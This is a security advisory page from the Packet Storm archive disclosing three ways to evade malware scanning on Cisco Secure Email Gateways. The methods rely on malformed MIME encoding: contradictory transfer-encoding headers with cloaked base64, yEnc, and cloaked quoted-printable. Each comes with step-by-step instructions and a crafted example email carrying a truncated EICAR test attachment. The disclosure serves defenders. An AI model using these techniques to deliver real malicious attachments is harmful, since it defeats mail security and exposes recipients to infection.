exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Secure Email Gateway Malware Detection Evasion

Cisco Secure Email Gateway Malware Detection Evasion
Posted Nov 15, 2022

Cisco Secure Email Gateways, formerly known as Cisco Ironport Email Security Appliances, that are configured to detect malicious email attachments, can easily be circumvented. A remote attacker can leverage error tolerance and different MIME decoding capabilities of email clients, compared with the gateway, to evade detection of malicious payloads by anti-virus components on the gateway. This exploit was successfully tested with a zip file containing the Eicar test virus and Cisco Secure Email Gateways with AsyncOS 14.2.0-620, 14.0.0-698, and others. An affected Email Client was Mozilla Thunderbird 91.11.0 (64-bit).

tags | exploit, remote, virus, bypass
systems | cisco
SHA-256 | a5931b58de930bd24c3bccaf43e04d89110ae41e6a2a05986fc0b34ab1d30ebd

Cisco Secure Email Gateway Malware Detection Evasion

Change Mirror Download

This report is being published within a coordinated disclosure
procedure. The researcher has been in contact with the vendor
but not received a satisfactory response within a given time
frame. As the attack complexity is low and exploits have already
been published by a third party there must be no further delay
in making the threads publicly known.

The researcher prefers not to take credit for their findings.


Evading Malware Detection by Cisco Secure Email Gateways
========================================================

Cisco Secure Email Gateways, formerly known as Cisco Ironport
Email Security Appliances, that are configured to detect
malicious email attachments, can easily be circumvented.
A remote attacker can leverage error tolerance and different
MIME decoding capabilities of email clients, compared with the
gateway, to evade detection of malicious payloads by anti-virus
components on the gateway.

Method 1: Cloaked Base 64
-------------------------

Step-by-step instruction:

1. Prepare an email with the malicious attachment with a
commonplace email client or employing standard MIME encoding,
using content-transfer-encoding base64.

2. Insert CR+LF line breaks at random places in the base64
encoded block so that the lines have different lengths,
but in a way that groups of four base64 characters (encoding
three bytes) stay together. This is intended to evade naïve
heuristics to detect base64 even out of context, while not
violating the MIME standard.

3. Before the content-transfer-encoding header of the attachment,
insert another contradictory header "Content-Transfer-Encoding:
quoted-printable". This does violate the MIME standard.

4. Remove any content-length headers of the message, if present.

A complete email prepared in this way may look like this:

----------------------- begin example -----------------------
From: Mallory <mallory@example.com>
To: Alice <alice@example.com>
Date: Mon, 27 Jun 2022 18:29:22 +0200
Subject: Your present
Mime-Version: 1.0
Message-Id: <b31a762c.8b44.63b67b5a@example.com>
Content-type: multipart/mixed; boundary=boundary_ef5dcd26

--boundary_ef5dcd26
Content-type: text/plain
Content-Transfer-Encoding: quoted-printable

Here is your present.
--boundary_ef5dcd26
Content-type: application/octet-stream
Content-Disposition: attachment; filename="present.zip"
Content-Transfer-Encoding: quoted-printable
Content-Transfer-Encoding: base64

UEsD
BAoAAAAAAN2Q
21Q8z1FoRAAAAEQAAAAJABwAZWlj
YXIuY29tVVQJAAOh
[... more similar lines skipped ...]
CwAB
BPgDAAAE6QMAAFBLBQYAAAAAAQABAE8A
AACHAAAAAAA=
--boundary_ef5dcd26--
----------------------- end example -----------------------

Emails prepared in this fashion will pass through affected
gateways with a verdict of being clean from malware, even if
the attachment is otherwise easily recognizable malware such as
the Eicar test virus. Many popular email clients, on the other
hand, will present the attached file and faithfully reproduce
it upon saving.

Affected systems:

This exploit was successfully tested with a zip file containing
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS
14.2.0-620, 14.0.0-698, and others. Affected Email Clients were
Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build
16.0.15726.20070) 64-bit, Mozilla Thunderbird 91.11.0 (64-bit),
Vivaldi 5.5.2805.42 (64-bit), Mutt 2.1.4-1ubuntu1.1, and others.

Method 2: yEnc Encoding
-----------------------

yEncode or short yEnc is an encoding typically employed by
usenet clients. Some email clients are capable of decoding MIME
parts with this encoding, too. A remote attacker using this
encoding for a malicious email attachment will evade malware
detection by affected gateways but may succeed in delivering
the payload to victims if they use particular email clients.
Other email clients will store the attachment in an undecoded
and thus not directly harmful form.

An email prepared in this way may look like this:

----------------------- begin example -----------------------
From: Mallory <mallory@example.com>
To: Alice <alice@example.com>
Date: Mon, 27 Jun 2022 18:29:22 +0200
Subject: Your present
Mime-Version: 1.0
Message-Id: <b31a762c.8b44.63b67b5a@example.com>
Content-type: multipart/mixed; boundary=boundary_ef5dcd26

--boundary_ef5dcd26
Content-type: text/plain
Content-Transfer-Encoding: quoted-printable

Here is your present.
--boundary_ef5dcd26
Content-type: application/octet-stream
Content-Disposition: attachment; filename="present.zip"
Content-Transfer-Encoding: x-yencode

=ybegin line=128 size=236 name=file.bin
[... binary content skipped ...]
=yend size=236
--boundary_ef5dcd26--
----------------------- end example -----------------------

Affected Systems:

This exploit was successfully tested with a zip file containing
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS
14.2.0-620, 14.0.0-698, and others. An affected Email Client
was Mozilla Thunderbird 91.11.0 (64-bit).

Method 3: Cloaked Quoted-Printable
----------------------------------

This method is similar to method 1 with the roles of
quoted-printable and base64 swapped. The payload has to
be encoded quoted-printable, but with each byte rather than
just non-printable bytes encoded and on separate lines with
continuation. The contradicting headers now come in the order
base64, quoted-printable.

An email prepared in this way may look like this:

----------------------- begin example -----------------------
From: Mallory <mallory@example.com>
To: Alice <alice@example.com>
Date: Mon, 27 Jun 2022 18:29:22 +0200
Subject: Your present
Mime-Version: 1.0
Message-Id: <b31a762c.8b44.63b67b5a@example.com>
Content-type: multipart/mixed; boundary=boundary_ef5dcd26

--boundary_ef5dcd26
Content-type: text/plain
Content-Transfer-Encoding: quoted-printable

Here is your present.
--boundary_ef5dcd26
Content-type: application/octet-stream
Content-Disposition: attachment; filename="present.zip"
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable

=50=
=4B=
=03=
=04=
[... more similar lines skipped ...]
=00=
=00=
=00=
=00=
--boundary_ef5dcd26--
----------------------- end example -----------------------

Affected Systems:

This exploit was successfully tested with a zip file containing
the Eicar test virus and Cisco Secure Email Gateways with AsyncOS
14.2.0-620, 14.0.0-698, and others. Affected Email Clients
were Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1.

References
----------

Code employing the methods presented here and many similar
techniques to manipulate MIME encoding can be found on GitHub:
https://github.com/noxxi/mime-is-broken

Cisco has published an advisory with a workaround
facilitating an undocumented feature of the gateway that
can be used to block incorrect MIME. This mitigates
many cases of the test suite from GitHub, but not all,
particularly not the ones presented in this report. URL:
https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwc34679

End of the report.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close